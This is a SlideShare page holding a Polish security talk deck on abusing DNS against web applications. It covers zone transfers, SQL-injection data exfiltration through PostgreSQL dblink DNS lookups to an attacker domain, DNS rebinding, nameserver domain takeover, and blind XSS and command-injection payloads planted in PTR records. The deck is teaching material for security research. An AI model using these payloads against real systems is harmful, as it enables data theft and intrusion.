SlideShare uma empresa Scribd logo

4Developers: Dns vs webapp

PROIDEA
PROIDEA

Podczas prelekcji będzie można się dowiedzieć jak działa protokół DNS oraz jak może zostać nadużyty na korzyść atakującego aplikacje Webowe.

Tecnologia
1 de 77
Baixar para ler offline
DNS vs Webapps Jakub Żoczek
$ whoami •  Specjalista ds. Bezpieczeństwa Systemów IT •  Security Researcher •  Bug Hunter
DNS
DNS $ host -t ns . . name server l.root-servers.net. . name server f.root-servers.net. . name server g.root-servers.net. . name server d.root-servers.net. . name server j.root-servers.net. . name server a.root-servers.net. . name server k.root-servers.net. . name server m.root-servers.net. . name server c.root-servers.net. . name server e.root-servers.net. . name server b.root-servers.net. . name server h.root-servers.net. . name server i.root-servers.net.
DNS
DNS $ host -t ns pl. pl name server a-dns.pl. pl name server c-dns.pl. pl name server d-dns.pl. pl name server e-dns.pl. pl name server f-dns.pl. pl name server g-dns.pl. pl name server h-dns.pl. pl name server i-dns.pl.
DNS
DNS $ host -t ns wp.pl wp.pl name server ns2.wp.pl. wp.pl name server ns1.wp.pl. wp.pl name server ns1.task.gda.pl.
DNS
DNS $ host -t ns poczta.wp.pl poczta.wp.pl has no NS record $ host -t A poczta.wp.pl poczta.wp.pl has address 212.77.101.148
Typy rekordów localhost IN A 127.0.0.1 ipv6 IN AAAA 2001:6d8:10:1667::6667 wow IN NS ns1.evil.com. go IN CNAME google.com. ala IN TXT "ala ma kota" 1 IN PTR 8.8.8.8 @ IN MX 10 smtp.evil.com. * IN A 142.62.4.13
Information Disclosure
Information Disclosure •  svn.evil.com •  git.evil.com •  mysql.evil.com •  www2.evil.com •  test.evil.com •  beta.evil.com •  dev.evil.com •  vpn.evil.com
Information Disclosure •  svn.evil.com •  git.evil.com •  mysql.evil.com •  www2.evil.com •  test.evil.com •  beta.evil.com •  dev.evil.com •  vpn.evil.com •  (…) $ host orange.pl orange.pl has address 80.48.169.1 orange.pl mail is handled by 5 mx5.orange.pl. orange.pl mail is handled by 0 mx.orange.pl. $ host 80.48.169.1 1.169.48.80.in-addr.arpa domain name pointer www2.orange.pl. $ host 80.48.169.2 2.169.48.80.in-addr.arpa domain name pointer mobile2.orange.pl. $ host 80.48.169.3 3.169.48.80.in-addr.arpa domain name pointer xwi2.orange.pl. (…)
Tools •  https://github.com/TheRook/subbrute •  https://github.com/aboul3la/Sublist3r •  http://www.yougetsignal.com/ •  http://bgp.he.net/
Zone Transfer
Zone Transfer
Zone Transfer
Zone Transfer
$ dig @fns2.42.pl televoice.pl axfr ; <<>> DiG 9.7.3 <<>> @fns2.42.pl televoice.pl axfr ; (2 servers found) ;; global options: +cmd televoice.pl. 86400 IN SOA fns1.42.pl. dns.sotiko.pl. 1361872990 10800 3600 604800 10800 televoice.pl. 86400 IN A 91.199.22.117 www.admin.televoice.pl. 86400 IN A 91.199.22.117 dokumenty.televoice.pl. 86400 IN CNAME ghs.google.com. ftp.televoice.pl. 86400 IN A 91.199.22.117 kalendarz.televoice.pl. 86400 IN CNAME ghs.google.com. old.televoice.pl. 86400 IN A 91.199.22.117 poczta.televoice.pl. 86400 IN A 91.199.22.117 sip.televoice.pl. 86400 IN A 195.162.16.201 sklep.televoice.pl. 86400 IN A 91.199.22.117 www.sklep.televoice.pl. 86400 IN A 91.199.22.117 www.sklep2.televoice.pl. 86400 IN A 91.199.22.117 sql.televoice.pl. 86400 IN A 91.199.22.117 sql2.televoice.pl. 86400 IN A 91.199.22.117 start.televoice.pl. 86400 IN CNAME ghs.google.com.
Zone Transfer $ ./zone.pl gov.sl Checking ns1.neoip.com... failed. Checking ns2.neoip.com... OK! gov.sl. 21600 IN SOA ns1.neoip.com. 1408140001. ( 10800 ;serial 3600 ;refresh 604800 ;retry 21600 ;expire 3600 ) ;minimum gov.sl. 21600 IN NS ns2.neoip.com. gov.sl. 21600 IN NS ns1.neoip.com. statehouse.gov.sl. 21600 IN NS ns1.egovhosting.com. statehouse.gov.sl. 21600 IN NS ns2.egovhosting.com. tsl.gov.sl. 21600 IN NS NS 1.EHOSTING.COM. pharmacyboard.gov.sl. 21600 IN NS ns53.domaincontrol.com. pharmacyboard.gov.sl. 21600 IN NS ns54.domaincontrol.com. mof.gov.sl. 21600 IN NS ns1.ixwebhosting.com. mof.gov.sl. 21600 IN NS ns2.ixwebhosting.com. mofa.gov.sl. 21600 IN NS ns1.abac.com.
Zone Transfer bi. 86400 IN SOA ns.nic.bi. registry.nic.bi. ( 2014082629 ;serial 21600 ;refresh 3600 ;retry 604800 ;expire 86400 ) ;minimum bi. 86400 IN TXT "Generation Time: 1409056444" bi. 86400 IN NS bi.cctld.authdns.ripe.net. bi. 86400 IN NS ns.nic.bi. bi. 86400 IN NS dns.princeton.edu. bi. 86400 IN NS ns1.nic.bi. bi. 86400 IN NS anyns.nic.bi. bi. 86400 IN NS ns-bi.afrinic.net. 100.bi. 86400 IN NS ns11.xincache.com. 100.bi. 86400 IN NS ns12.xincache.com. 101domain.bi. 86400 IN NS ns1.101domain.com. 101domain.bi. 86400 IN NS ns2.101domain.com. 101domain.bi. 86400 IN NS ns5.101domain.com. 101domains.bi. 86400 IN NS ns1.101domain.com. 101domains.bi. 86400 IN NS ns2.101domain.com. 101domains.bi. 86400 IN NS ns5.101domain.com.
Zone Transfer an ao arpa bb bd bf bi bs bv capetown ci cv cw cy do durban eg er gp gq gt gy kh int joburg ke kg kw mg mo mp mw ni np pe pf pg py sc sj sl sv tel to zw -  ripe.net -  gnu.org -  poznan.pl
Data Exfiltration
Data Exfiltration
Data Exfiltration
Data Exfiltration •  Error Based SQL Injection
Data Exfiltration •  Error Based SQL Injection •  Blind SQL Injection
Data Exfiltration •  Error Based SQL Injection •  Blind SQL Injection •  Time-Based SQL Injection
Data Exfiltration •  Error Based SQL Injection •  Blind SQL Injection •  Time-Based SQL Injection •  Data Exfiltration
Data Exfiltration $ cat /etc/bind/named.conf (…) logging{ channel example_log { file "/var/log/dns.log" versions 3 size 2m; severity info; print-severity yes; print-time yes; print-category yes; }; category "queries" { example_log; }; };
Data Exfiltration $ host onet.pl localhost Using domain server: Name: localhost Address: 127.0.0.1#53 Aliases: onet.pl has address 213.180.141.140 onet.pl mail is handled by 1 mx.poczta.onet.pl. $ tail -n 3 /var/log/dns.log 15-Aug-2014 16:35:57.533 queries: info: client 127.0.0.1#46730: query: onet.pl IN A + (127.0.0.1) 15-Aug-2014 16:35:57.533 queries: info: client 127.0.0.1#33283: query: onet.pl IN AAAA + (127.0.0.1) 15-Aug-2014 16:35:57.534 queries: info: client 127.0.0.1#41577: query: onet.pl IN MX + (127.0.0.1)
Data Exfiltration INSERT (…) VALUES ('123'); è 123 INSERT (…) VALUES ('x'||user||'x'); è xtestx INSERT (…) VALUES ('x'||(SELECT 123)||'x'); è x123x
Data Exfiltration INSERT (…) VALUES ('123'); è 123 INSERT (…) VALUES ('x'||user||'x'); è xtestx INSERT (…) VALUES ('x'||(SELECT 123)||'x'); è x123x INSERT (…) VALUES ( 'x'||(SELECT dblink_connect('host=pwnd.uid0.pl user=1 password=2')) ||'x' ); DNS Request
Data Exfiltration INSERT (…) VALUES ( 'x'||(SELECT dblink_connect('host='||(SELECT current_database())||'.uid0.pl user=1 password=2')) ||'x' ); DNS Request
Data Exfiltration INSERT (…) VALUES ( 'x'||(SELECT dblink_connect('host='||(SELECT current_database())||'.uid0.pl user=1 password=2')) ||'x' ); DNS Request $ tail -n 1 /var/log/dns.log 26-Aug-2014 13:08:22.668 queries: info: client 173.194.90.82#38036: query: postgres.uid0.pl IN AAAA - ED (80.86.91.39)
DNS Rebinding
DNS Rebinding
DNS Rebinding $ cat .htaccess <Files btc.txt> Order deny,allow Deny from all Allow from 127.0.0.1 </Files>
DNS Rebinding
DNS Rebinding
DNS Rebinding Request nr 1
DNS Rebinding Request nr 1 Request nr 2
DNS Rebinding Request nr 1 Request nr 2 $ for a in `seq 1 10`; do host rebind.uid0.pl ; done rebind.uid0.pl has address 127.0.0.1 rebind.uid0.pl has address 80.86.91.39 rebind.uid0.pl has address 127.0.0.1 rebind.uid0.pl has address 80.86.91.39 rebind.uid0.pl has address 127.0.0.1 rebind.uid0.pl has address 80.86.91.39 rebind.uid0.pl has address 127.0.0.1 rebind.uid0.pl has address 80.86.91.39 rebind.uid0.pl has address 127.0.0.1 rebind.uid0.pl has address 80.86.91.39
DNS Rebinding
Domain Takeover
Domain Takeover $ host -t ns getclouder.com getclouder.com name server cumulus.getclouder.com. getclouder.com name server nimbus.getclouder.com.
Domain Takeover
Domain Takeover
Domain Takeover $ host -t ns clouder.us clouder.us name server ns2.clev1.net. clouder.us name server ns1.clev1.net.
Domain Takeover ns1.clev1.net has address 181.224.128.6 ns2.clev1.net has address 198.20.77.76
Domain Takeover ns1.clev1.net has address 181.224.128.6 ns2.clev1.net has address 198.20.77.76 nimbus.getclouder.com has address 181.224.128.6 cumulus.getclouder.com has address 198.20.77.76
Domain Takeover ns1.clev1.net has address 181.224.128.6 ns2.clev1.net has address 198.20.77.76 nimbus.getclouder.com has address 181.224.128.6 cumulus.getclouder.com has address 198.20.77.76
Domain Takeover
Domain Takeover
$ host wow.ns1.clev1.net wow.ns1.clev1.net has address 1.2.3.4
$ dig +trace ns1.clev1.net (…) clev1.net. 172800 IN NS ns1.clev1.net. clev1.net. 172800 IN NS ns2.clev1.net. ;; Received 95 bytes from 192.55.83.30#53(192.55.83.30) in 167 ms ns1.clev1.net. 86400 IN A 8.8.4.4 ns1.clev1.net. 86400 IN A 8.8.8.8 ns1.clev1.net. 86400 IN NS cumulus.getclouder.com. ns1.clev1.net. 86400 IN NS nimbus.getclouder.com. ;; Received 152 bytes from 181.224.128.6#53(181.224.128.6) in 174 ms
[16:28:52] 181.224.128.4: proxying the response of type 'A' for ns2.siteground305.com [16:28:52] 181.224.128.4: proxying the response of type 'A' for ns1.siteground305.com [16:28:57] 181.224.128.4: proxying the response of type 'A' for ns1.siteground305.com [16:28:57] 181.224.128.4: proxying the response of type 'A' for ns2.siteground305.com [16:29:01] 181.224.128.4: proxying the response of type 'MX' for artiste.com.mt [16:29:06] 181.224.128.5: proxying the response of type 'A' for ns2.openprovider.be [16:29:06] 181.224.128.5: proxying the response of type 'A' for ns3.openprovider.eu [16:29:06] 181.224.128.5: proxying the response of type 'A' for ns1.openprovider.nl [16:29:07] 181.224.128.4: proxying the response of type 'A' for ns2.transip.eu [16:29:09] 181.224.128.4: proxying the response of type 'MX' for artiste.com.mt [16:29:25] 181.224.128.4: proxying the response of type 'A' for ns1.betristofan.dk [16:29:25] 181.224.128.4: proxying the response of type 'A' for ns2.betristofan.dk [16:29:28] 181.224.128.4: proxying the response of type 'MX' for ablecomputing.com.fj [16:29:43] 181.224.128.5: proxying the response of type 'A' for shades02.rzone.de [16:29:43] 181.224.128.5: proxying the response of type 'A' for docks20.rzone.de [16:29:44] 181.224.128.5: proxying the response of type 'A' for smtp.rzone.de [16:29:47] 181.224.128.4: proxying the response of type 'A' for ns2.siteground144.com [16:29:47] 181.224.128.4: proxying the response of type 'A' for ns1.siteground144.com
Blind XSS
Blind XSS f<img/src=http://attacker.com/xss.gif>
Blind XSS f<img/src=http://attacker.com/xss.gif> XSS Executed
Blind XSS f<img/src=http://attacker.com/xss.gif> XSS Executed Apache access_log
Blind XSS $ host 77.254.88.134 134.88.254.77.in-addr.arpa domain name pointer 77-254-88-134.adsl.inetia.pl.
Blind XSS $ host 77.254.88.134 134.88.254.77.in-addr.arpa domain name pointer 77-254-88-134.adsl.inetia.pl.
Blind XSS 84.85.86.87 87. 87.86.85.84.in-addr.arpa
Blind XSS $ host -t ns 88.254.77.in-addr.arpa 88.254.77.in-addr.arpa name server rumba.inetia.pl. 88.254.77.in-addr.arpa name server chacha.inetia.pl.
Blind XSS
Blind XSS zone "192/26.122.204.87.in-addr.arpa." IN { type master; allow-transfer { 109.173.165.151; }; check-names ignore; file "/etc/bind/87.204.122.210"; };
Blind XSS $TTL 3600 @ IN SOA ns1.ropchain.org. admin.ropchain.org. ( 2014011417 ;serial 14400 ;refresh 3600 ;retry 604800 ;expire 10800 ;minimum ) @ IN NS ns1.ropchain.org. @ IN NS ns2.ropchain.org. 1 IN PTR ropchain.org. 210 IN PTR f"><img/src=http://monitor.ropchain.org/xss.gif>f.x.uid0.pl. 211 IN PTR a`uname`a.x.uid0.pl. 212 IN PTR ropchain.org.
Blind XSS $ host 87.204.122.210 210.122.204.87.in-addr.arpa is an alias for 210.192/26.122.204.87.in-addr.arpa. 210.192/26.122.204.87.in-addr.arpa domain name pointer f"><img/src=http:// monitor.ropchain.org/xss.gif>f.x.uid0.pl.
Blind XSS
Pytania? Jakub Żoczek jakub.zoczek@allegrogroup.com zoczus@gmail.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://twitter.com/zoczus http://hackerone.com/zoczus http://zoczus.blogspot.com http://ropchain.org
http://kariera.allegro.pl/

Recomendados

dns-sec-4-slides
dns-sec-4-slidesdns-sec-4-slides
dns-sec-4-slides
kj teoh
 
Defcon
DefconDefcon
Defcon
OpenDNS
 
dns.workshop.hsgr
dns.workshop.hsgrdns.workshop.hsgr
dns.workshop.hsgr
ebalaskas
 
DNSSEC signing Tutorial
DNSSEC signing Tutorial DNSSEC signing Tutorial
DNSSEC signing Tutorial
Men and Mice
 
Namespaces for Local Networks
Namespaces for Local NetworksNamespaces for Local Networks
Namespaces for Local Networks
Men and Mice
 
DNS High-Availability Tools - Open-Source Load Balancing Solutions
DNS High-Availability Tools - Open-Source Load Balancing SolutionsDNS High-Availability Tools - Open-Source Load Balancing Solutions
DNS High-Availability Tools - Open-Source Load Balancing Solutions
Men and Mice
 
2009 Itc Nslookup Rev01
2009 Itc Nslookup Rev012009 Itc Nslookup Rev01
2009 Itc Nslookup Rev01
JayMNEA
 
DNS-SD Extentions
DNS-SD ExtentionsDNS-SD Extentions
DNS-SD Extentions
Nina Buchina
 

Recomendados

dns-sec-4-slides
dns-sec-4-slidesdns-sec-4-slides
dns-sec-4-slides
kj teoh
 
Defcon
DefconDefcon
Defcon
OpenDNS
 
dns.workshop.hsgr
dns.workshop.hsgrdns.workshop.hsgr
dns.workshop.hsgr
ebalaskas
 
DNSSEC signing Tutorial
DNSSEC signing Tutorial DNSSEC signing Tutorial
DNSSEC signing Tutorial
Men and Mice
 
Namespaces for Local Networks
Namespaces for Local NetworksNamespaces for Local Networks
Namespaces for Local Networks
Men and Mice
 
DNS High-Availability Tools - Open-Source Load Balancing Solutions
DNS High-Availability Tools - Open-Source Load Balancing SolutionsDNS High-Availability Tools - Open-Source Load Balancing Solutions
DNS High-Availability Tools - Open-Source Load Balancing Solutions
Men and Mice
 
2009 Itc Nslookup Rev01
2009 Itc Nslookup Rev012009 Itc Nslookup Rev01
2009 Itc Nslookup Rev01
JayMNEA
 
DNS-SD Extentions
DNS-SD ExtentionsDNS-SD Extentions
DNS-SD Extentions
Nina Buchina
 
Part 2 - Local Name Resolution in Windows Networks
Part 2 - Local Name Resolution in Windows NetworksPart 2 - Local Name Resolution in Windows Networks
Part 2 - Local Name Resolution in Windows Networks
Men and Mice
 
There's no place like 127.0.0.1 - Achieving "reliable" DNS rebinding in moder...
There's no place like 127.0.0.1 - Achieving "reliable" DNS rebinding in moder...There's no place like 127.0.0.1 - Achieving "reliable" DNS rebinding in moder...
There's no place like 127.0.0.1 - Achieving "reliable" DNS rebinding in moder...
Luke Young
 
The DNSSEC KSK of the root rolls
The DNSSEC KSK of the root rollsThe DNSSEC KSK of the root rolls
The DNSSEC KSK of the root rolls
Men and Mice
 
Fast Detection of New Malicious Domains using DNS
Fast Detection of New Malicious Domains using DNSFast Detection of New Malicious Domains using DNS
Fast Detection of New Malicious Domains using DNS
OpenDNS
 
Part 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOS
Part 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOSPart 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOS
Part 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOS
Men and Mice
 
The CAA-Record for increased encryption security
The CAA-Record for increased encryption securityThe CAA-Record for increased encryption security
The CAA-Record for increased encryption security
Men and Mice
 
2012 07-24 dnssec-og_open_dnssec_-_martin_toft_og_georg_sluyterman_slideshow
2012 07-24 dnssec-og_open_dnssec_-_martin_toft_og_georg_sluyterman_slideshow2012 07-24 dnssec-og_open_dnssec_-_martin_toft_og_georg_sluyterman_slideshow
2012 07-24 dnssec-og_open_dnssec_-_martin_toft_og_georg_sluyterman_slideshow
sman_dk
 
Understanding the DNS & DNSSEC
Understanding the DNS & DNSSECUnderstanding the DNS & DNSSEC
Understanding the DNS & DNSSEC
ICANN
 
DNS OARC 27: DNS over IPv6 - A study in fragmentation
DNS OARC 27: DNS over IPv6 - A study in fragmentationDNS OARC 27: DNS over IPv6 - A study in fragmentation
DNS OARC 27: DNS over IPv6 - A study in fragmentation
APNIC
 
DNS – Domain Name Service
DNS – Domain Name ServiceDNS – Domain Name Service
DNS – Domain Name Service
Johnny Fortune
 
Dns
DnsDns
Dns
ARYA TM
 
New DNS Traffic Analysis Techniques to Identify Global Internet Threats
New DNS Traffic Analysis Techniques to Identify Global Internet ThreatsNew DNS Traffic Analysis Techniques to Identify Global Internet Threats
New DNS Traffic Analysis Techniques to Identify Global Internet Threats
OpenDNS
 
fog or: How I Learned to Stop Worrying and Love the Cloud (OpenStack Edition)
fog or: How I Learned to Stop Worrying and Love the Cloud (OpenStack Edition)fog or: How I Learned to Stop Worrying and Love the Cloud (OpenStack Edition)
fog or: How I Learned to Stop Worrying and Love the Cloud (OpenStack Edition)
Wesley Beary
 
DNSSEC: The Antidote to DNS Cache Poisoning and Other DNS Attacks
DNSSEC: The Antidote to DNS Cache Poisoning and Other DNS AttacksDNSSEC: The Antidote to DNS Cache Poisoning and Other DNS Attacks
DNSSEC: The Antidote to DNS Cache Poisoning and Other DNS Attacks
FindWhitePapers
 
Encrypted DNS - DNS over TLS / DNS over HTTPS
Encrypted DNS - DNS over TLS / DNS over HTTPSEncrypted DNS - DNS over TLS / DNS over HTTPS
Encrypted DNS - DNS over TLS / DNS over HTTPS
Alex Mayrhofer
 
linux networking commands short
linux networking commands shortlinux networking commands short
linux networking commands short
Sayed Ahmed
 
Dns introduction
Dns introduction Dns introduction
Dns introduction
sunil kumar
 
Soa with consul
Soa with consulSoa with consul
Soa with consul
Rajesh Sharma
 
Static Typing in Vault
Static Typing in VaultStatic Typing in Vault
Static Typing in Vault
GlynnForrest
 
7 technical-dns-workshop-day3
7 technical-dns-workshop-day37 technical-dns-workshop-day3
7 technical-dns-workshop-day3
DNS Entrepreneurship Center
 
DNS_Tutorial 2.pptx
DNS_Tutorial 2.pptxDNS_Tutorial 2.pptx
DNS_Tutorial 2.pptx
viditsir
 
DNS-SD
DNS-SDDNS-SD
DNS-SD
netvis
 

Mais conteúdo relacionado

Mais procurados

fog or: How I Learned to Stop Worrying and Love the Cloud (OpenStack Edition)
fog or: How I Learned to Stop Worrying and Love the Cloud (OpenStack Edition)fog or: How I Learned to Stop Worrying and Love the Cloud (OpenStack Edition)
fog or: How I Learned to Stop Worrying and Love the Cloud (OpenStack Edition)
Wesley Beary
 
Dns introduction
Dns introduction Dns introduction
Dns introduction
sunil kumar
 
7 technical-dns-workshop-day3
7 technical-dns-workshop-day37 technical-dns-workshop-day3
7 technical-dns-workshop-day3
DNS Entrepreneurship Center
 

Mais procurados (20)

Part 2 - Local Name Resolution in Windows Networks
Part 2 - Local Name Resolution in Windows NetworksPart 2 - Local Name Resolution in Windows Networks
Part 2 - Local Name Resolution in Windows Networks
 
There's no place like 127.0.0.1 - Achieving "reliable" DNS rebinding in moder...
There's no place like 127.0.0.1 - Achieving "reliable" DNS rebinding in moder...There's no place like 127.0.0.1 - Achieving "reliable" DNS rebinding in moder...
There's no place like 127.0.0.1 - Achieving "reliable" DNS rebinding in moder...
 
The DNSSEC KSK of the root rolls
The DNSSEC KSK of the root rollsThe DNSSEC KSK of the root rolls
The DNSSEC KSK of the root rolls
 
Fast Detection of New Malicious Domains using DNS
Fast Detection of New Malicious Domains using DNSFast Detection of New Malicious Domains using DNS
Fast Detection of New Malicious Domains using DNS
 
Part 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOS
Part 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOSPart 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOS
Part 3 - Local Name Resolution in Linux, FreeBSD and macOS/iOS
 
The CAA-Record for increased encryption security
The CAA-Record for increased encryption securityThe CAA-Record for increased encryption security
The CAA-Record for increased encryption security
 
2012 07-24 dnssec-og_open_dnssec_-_martin_toft_og_georg_sluyterman_slideshow
2012 07-24 dnssec-og_open_dnssec_-_martin_toft_og_georg_sluyterman_slideshow2012 07-24 dnssec-og_open_dnssec_-_martin_toft_og_georg_sluyterman_slideshow
2012 07-24 dnssec-og_open_dnssec_-_martin_toft_og_georg_sluyterman_slideshow
 
Understanding the DNS & DNSSEC
Understanding the DNS & DNSSECUnderstanding the DNS & DNSSEC
Understanding the DNS & DNSSEC
 
DNS OARC 27: DNS over IPv6 - A study in fragmentation
DNS OARC 27: DNS over IPv6 - A study in fragmentationDNS OARC 27: DNS over IPv6 - A study in fragmentation
DNS OARC 27: DNS over IPv6 - A study in fragmentation
 
DNS – Domain Name Service
DNS – Domain Name ServiceDNS – Domain Name Service
DNS – Domain Name Service
 
Dns
DnsDns
Dns
 
New DNS Traffic Analysis Techniques to Identify Global Internet Threats
New DNS Traffic Analysis Techniques to Identify Global Internet ThreatsNew DNS Traffic Analysis Techniques to Identify Global Internet Threats
New DNS Traffic Analysis Techniques to Identify Global Internet Threats
 
fog or: How I Learned to Stop Worrying and Love the Cloud (OpenStack Edition)
fog or: How I Learned to Stop Worrying and Love the Cloud (OpenStack Edition)fog or: How I Learned to Stop Worrying and Love the Cloud (OpenStack Edition)
fog or: How I Learned to Stop Worrying and Love the Cloud (OpenStack Edition)
 
DNSSEC: The Antidote to DNS Cache Poisoning and Other DNS Attacks
DNSSEC: The Antidote to DNS Cache Poisoning and Other DNS AttacksDNSSEC: The Antidote to DNS Cache Poisoning and Other DNS Attacks
DNSSEC: The Antidote to DNS Cache Poisoning and Other DNS Attacks
 
Encrypted DNS - DNS over TLS / DNS over HTTPS
Encrypted DNS - DNS over TLS / DNS over HTTPSEncrypted DNS - DNS over TLS / DNS over HTTPS
Encrypted DNS - DNS over TLS / DNS over HTTPS
 
linux networking commands short
linux networking commands shortlinux networking commands short
linux networking commands short
 
Dns introduction
Dns introduction Dns introduction
Dns introduction
 
Soa with consul
Soa with consulSoa with consul
Soa with consul
 
Static Typing in Vault
Static Typing in VaultStatic Typing in Vault
Static Typing in Vault
 
7 technical-dns-workshop-day3
7 technical-dns-workshop-day37 technical-dns-workshop-day3
7 technical-dns-workshop-day3
 

Semelhante a 4Developers: Dns vs webapp

DNS_Tutorial 2.pptx
DNS_Tutorial 2.pptxDNS_Tutorial 2.pptx
DNS_Tutorial 2.pptx
viditsir
 
Mens jan piet_dnssec-in-practice
Mens jan piet_dnssec-in-practiceMens jan piet_dnssec-in-practice
Mens jan piet_dnssec-in-practice
kuchinskaya
 
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
CODE BLUE
 
Automate Your FME Server Installs, Take a Five Minute Break
Automate Your FME Server Installs, Take a Five Minute BreakAutomate Your FME Server Installs, Take a Five Minute Break
Automate Your FME Server Installs, Take a Five Minute Break
Safe Software
 
Configure Proxy and Firewall (Iptables)
Configure Proxy and Firewall (Iptables)Configure Proxy and Firewall (Iptables)
Configure Proxy and Firewall (Iptables)
Tola LENG
 

Semelhante a 4Developers: Dns vs webapp (20)

DNS_Tutorial 2.pptx
DNS_Tutorial 2.pptxDNS_Tutorial 2.pptx
DNS_Tutorial 2.pptx
 
DNS-SD
DNS-SDDNS-SD
DNS-SD
 
Query-name Minimization and Authoritative Server Behavior
Query-name Minimization and Authoritative Server BehaviorQuery-name Minimization and Authoritative Server Behavior
Query-name Minimization and Authoritative Server Behavior
 
Doing Horrible Things with DNS - Web Directions South
Doing Horrible Things with DNS - Web Directions SouthDoing Horrible Things with DNS - Web Directions South
Doing Horrible Things with DNS - Web Directions South
 
DNSSEC Tutorial, by Champika Wijayatunga [APNIC 38]
DNSSEC Tutorial, by Champika Wijayatunga [APNIC 38]DNSSEC Tutorial, by Champika Wijayatunga [APNIC 38]
DNSSEC Tutorial, by Champika Wijayatunga [APNIC 38]
 
Integration of neutron, nova and designate how to use it and how to configur...
Integration of neutron, nova and designate how to use it and how to configur...Integration of neutron, nova and designate how to use it and how to configur...
Integration of neutron, nova and designate how to use it and how to configur...
 
Mens jan piet_dnssec-in-practice
Mens jan piet_dnssec-in-practiceMens jan piet_dnssec-in-practice
Mens jan piet_dnssec-in-practice
 
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
[CB16] 80時間でWebを一周:クロムミウムオートメーションによるスケーラブルなフィンガープリント by Isaac Dawson
 
How I Learned to Stop Worrying and Love the Cloud - Wesley Beary, Engine Yard
How I Learned to Stop Worrying and Love the Cloud - Wesley Beary, Engine YardHow I Learned to Stop Worrying and Love the Cloud - Wesley Beary, Engine Yard
How I Learned to Stop Worrying and Love the Cloud - Wesley Beary, Engine Yard
 
DNS/DNSSEC by Nurul Islam
DNS/DNSSEC by Nurul IslamDNS/DNSSEC by Nurul Islam
DNS/DNSSEC by Nurul Islam
 
Hands-on DNSSEC Deployment
Hands-on DNSSEC DeploymentHands-on DNSSEC Deployment
Hands-on DNSSEC Deployment
 
Automate Your FME Server Installs, Take a Five Minute Break
Automate Your FME Server Installs, Take a Five Minute BreakAutomate Your FME Server Installs, Take a Five Minute Break
Automate Your FME Server Installs, Take a Five Minute Break
 
Living on the edge
Living on the edgeLiving on the edge
Living on the edge
 
How we use and deploy Varnish at Opera
How we use and deploy Varnish at OperaHow we use and deploy Varnish at Opera
How we use and deploy Varnish at Opera
 
Nagios Conference 2014 - Rob Hassing - How To Maintain Over 20 Monitoring App...
Nagios Conference 2014 - Rob Hassing - How To Maintain Over 20 Monitoring App...Nagios Conference 2014 - Rob Hassing - How To Maintain Over 20 Monitoring App...
Nagios Conference 2014 - Rob Hassing - How To Maintain Over 20 Monitoring App...
 
DNSSEC - WHAT IS IT ? INSTALL AND CONFIGURE IN CHROOT JAIL
DNSSEC - WHAT IS IT ? INSTALL AND CONFIGURE IN CHROOT JAILDNSSEC - WHAT IS IT ? INSTALL AND CONFIGURE IN CHROOT JAIL
DNSSEC - WHAT IS IT ? INSTALL AND CONFIGURE IN CHROOT JAIL
 
URL to HTML
URL to HTMLURL to HTML
URL to HTML
 
Docker 1.12 & Swarm Mode [Montreal Docker Meetup Sept. 2016]
Docker 1.12 & Swarm Mode [Montreal Docker Meetup Sept. 2016]Docker 1.12 & Swarm Mode [Montreal Docker Meetup Sept. 2016]
Docker 1.12 & Swarm Mode [Montreal Docker Meetup Sept. 2016]
 
Da APK al Golden Ticket
Da APK al Golden TicketDa APK al Golden Ticket
Da APK al Golden Ticket
 
Configure Proxy and Firewall (Iptables)
Configure Proxy and Firewall (Iptables)Configure Proxy and Firewall (Iptables)
Configure Proxy and Firewall (Iptables)
 

Último

Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Deploy with confidence: VMware Cloud Foundation 5.1 on next gen Dell PowerEdg...
Principled Technologies
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
panagenda
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
UK Journal
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
 

Último (20)

Automating Google Workspace (GWS) & more with Apps Script
